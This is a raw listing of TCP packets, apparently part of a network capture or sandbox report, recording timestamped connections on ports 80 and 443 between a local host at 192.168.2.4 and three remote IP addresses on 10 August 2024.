Aug 10, 2024 16:12:24.134713888 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.134757996 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.134789944 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.134799957 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.134799957 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.134835958 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.134840965 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.134872913 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.134910107 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.134915113 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.134942055 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.134974003 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.134985924 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.135009050 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135035992 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.135040998 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135054111 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.135071993 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135087013 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.135102987 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135134935 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135166883 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135199070 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135209084 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.135209084 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.135209084 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.135232925 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135270119 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135301113 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135325909 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.135332108 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135354042 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.135364056 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135376930 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.135385990 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.135396004 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135427952 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135437012 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.135449886 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135466099 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135481119 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135494947 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135499954 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.135510921 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135518074 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.135524988 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135539055 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135545015 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.135555029 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135565042 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.135569096 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135584116 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135591984 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.135597944 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135612011 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135621071 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.135626078 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135639906 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135642052 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.135648012 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.135654926 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135668993 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135674000 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.135683060 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135694981 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135703087 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.135710001 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135720015 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.135724068 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135737896 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135742903 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.135752916 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135766029 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135771990 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.135780096 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135783911 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.135793924 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135808945 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135809898 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.135822058 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135833025 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.135844946 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135854006 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.135859966 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135875940 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135879993 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.135890961 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135900021 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.135905027 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135917902 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135927916 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.135932922 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135946035 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135957003 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.135960102 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135974884 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.135974884 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135991096 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.135999918 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.136004925 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.136019945 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.136024952 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.136034012 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.136042118 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.136048079 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.136061907 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.136066914 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.136077881 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.136079073 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.136092901 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.136112928 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.136215925 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.150978088 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.151006937 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.151079893 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.151079893 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.151149988 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.151216030 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.171247959 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.171268940 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.171333075 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.171338081 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.171569109 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.175493002 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.175626993 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.175710917 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.175761938 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.175762892 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.175798893 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.175831079 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.175868988 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.175877094 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.175899982 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.175932884 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.175987005 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.176696062 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.176716089 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.176878929 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.176878929 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.176939964 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.177006006 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.177608967 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.177627087 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.177681923 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.177702904 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.177728891 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.177750111 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.178070068 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.178087950 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.178141117 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.178153992 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.178179026 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.178196907 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.178577900 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.178638935 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.178647041 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.178694963 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.178800106 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.178828955 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.212172031 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.212186098 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.212296009 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.212305069 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.212378979 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.212702036 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.212768078 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.212774038 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.212816954 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.212861061 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.212949038 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.213112116 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.213124037 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.213203907 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.213205099 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.213208914 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.213346958 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.213396072 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.213448048 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.213454008 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.213713884 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.213783026 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.213829041 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.213839054 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.213852882 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.213886023 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.213892937 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.214113951 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.214159012 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.214224100 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.214224100 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.214231014 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.214323997 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.214797020 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.214840889 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.214879990 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.214886904 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.214895964 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.214917898 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.215635061 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.215679884 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.215714931 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.215723991 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.215740919 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.215792894 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.215873003 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.215879917 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.215926886 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.216223955 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.216286898 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.216299057 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.216378927 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.217691898 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.217709064 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.217724085 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.217760086 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.217777014 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.217794895 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.217808962 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.217823982 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.217850924 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.217866898 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.217870951 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.217883110 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.217884064 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.217899084 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.217911959 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.217912912 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.217919111 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.217938900 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.217943907 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.217964888 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.217966080 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.217981100 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.218004942 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.218010902 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.218019009 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.218030930 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.218031883 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.218045950 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.218053102 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.218072891 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.218079090 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.218085051 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.218094110 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.218107939 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.218125105 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.218128920 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.218142986 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.218151093 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.218158007 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.218172073 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.218177080 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.218190908 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.218197107 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.218210936 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.218215942 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.218225002 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.218240976 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.218245983 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.218255997 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.218271971 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.218272924 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.218291998 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.218305111 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.218822002 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.218836069 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.218851089 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.218875885 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.218892097 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.218907118 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.218909979 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.218909979 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.218924046 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.218939066 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.218976974 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.218976974 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.218976974 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.218976974 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.219099045 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219114065 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219130039 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219145060 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219146967 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.219160080 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219182968 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.219211102 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.219233036 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219248056 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219264030 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219281912 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.219304085 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.219305038 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219317913 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219333887 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219371080 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.219417095 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219430923 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219445944 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219460964 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219468117 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.219477892 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219496012 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.219501019 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219515085 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219516993 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.219532013 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219537020 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.219547987 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219551086 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.219568014 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.219573021 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219582081 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.219588041 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219605923 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.219609022 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219624043 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219625950 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.219640970 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219643116 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.219683886 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.219686031 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219717979 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219733000 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219748020 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219762087 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219777107 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219784975 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.219784975 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.219818115 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.219818115 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219831944 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.219841957 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.219856024 CEST	80	49740	147.45.44.104	192.168.2.4
